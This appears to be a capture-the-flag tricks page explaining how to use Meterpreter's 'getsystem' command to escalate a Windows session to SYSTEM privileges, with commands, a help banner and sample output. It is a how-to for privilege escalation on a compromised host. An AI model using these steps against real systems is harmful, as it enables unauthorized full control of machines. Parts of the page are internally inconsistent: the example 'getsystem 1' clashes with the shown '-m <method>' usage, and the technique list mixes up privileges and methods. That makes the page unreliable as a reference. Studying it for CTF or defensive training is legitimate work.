> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-14/windows/getsystem/trick-0420.md).

# Meterpreter GetSystem Privilege Escalation

***

Within a Meterpreter session on a Windows target, you can automatically attempt several built-in privilege escalation techniques using the `getsystem` command. This command tries common methods like token impersonation to elevate your shell to `NT AUTHORITY\SYSTEM` privileges.

```meterpreter
getsystem
```

The `getsystem` command attempts privilege escalation using multiple techniques. These include:

* Service Impersonation (Named Pipe)
* Token Impersonation (which may utilize privileges like `SeAssignPrimaryTokenPrivilege` or `SeIncreaseQuotaPrivilege`, or work via `CreateProcessWithToken`)
* Named Pipe Impersonation (which may utilize privileges like `SeImpersonatePrivilege` or `SeCreateTokenPrivilege`, or work via `In Memory` methods)

If successful, your current session's user will be elevated to the `NT AUTHORITY\SYSTEM` context.

You can also specify a particular method to attempt using the `METHOD` option. To see the options:

```meterpreter
getsystem -h
```

```
Usage: getsystem [options]

Attempts to elevate the privilege of the current user to that of the SYSTEM user.

OPTIONS:

    -h        Help banner.
    -m <method>  Specify the method to use (1, 2, or 3).
```

For example, to try only the first method:

```meterpreter
getsystem 1
```

If a method fails, you can try the next one. A successful attempt will show output similar to:

```
...
[*] Got a SYSTEM shell (1337)!
...
```
